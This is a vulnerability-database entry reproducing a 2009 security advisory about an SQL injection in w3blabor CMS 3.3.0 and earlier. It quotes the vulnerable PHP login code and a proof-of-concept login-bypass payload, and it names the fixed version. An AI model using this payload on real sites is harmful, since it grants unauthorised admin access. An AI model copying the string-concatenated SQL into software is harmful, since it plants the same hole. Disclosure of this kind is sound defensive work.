Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

w3blabor CMS 3.3.0 SQL Injection

🗓️ 02 Jan 2009 00:00:00Reported by DNXType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

w3blabor CMS 3.3.0 SQL Injection in Admin Logi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
` \#'#/  
(-.-)  
------------------oOO---(_)---OOo-----------------  
| __ __ |  
| _____/ /_____ ______/ /_ __ ______ ______ |  
| / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |  
| (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |  
| /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |  
| Security Research Division /____/ 2oo8 |  
--------------------------------------------------  
| w3blabor CMS <= v3.3.0 Admin Login Bypass |  
| (requires magic_quotes_gpc = Off) |  
--------------------------------------------------  
[!] Discovered.: DNX  
[!] Vendor.....: http://www.w3blaborcms.de  
[!] Detected...: 20.12.2008  
[!] Reported...: 20.12.2008  
[!] Response...: 21.12.2008  
  
[!] Background.: Sicher! Schnell! Einfach!  
Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe  
abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der  
angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im  
Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht  
es zu etwas Besonderem!  
  
[!] Bug........: $_POST['benutzername'] & $_POST['passwort'] in admin/index.php near line 93  
  
93: if (isset($_GET['action']) && $_GET['action'] == "login" && $_POST['benutzername'] != "" && $_POST['passwort'] != "") {  
94:  
95: $check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."'"));  
96:  
97: if ($check['benutzername'] == "") {  
98:  
99: $_SESSION['login'] = false;  
100: header("Location: index.php?fehler=error001");  
101: exit;  
102:  
103: } else {  
104:  
105: $md5pw = md5($_POST['passwort']);  
106:  
107: $check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."' AND passwort='".$md5pw."'"));  
  
[!] PoC........: To bypass the admin login:  
  
Username: x' or 1=1/*  
Password: not empty  
  
[!] Solution...: upgrade to version 3.4.0  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Jan 2009 00:00Current
w3blabor cmssql injectionadmin login bypasssecurity research divisionvendordetectedreportedbackgroundbugpocsolutionupgrade to version 3.4.0
42
.json
Report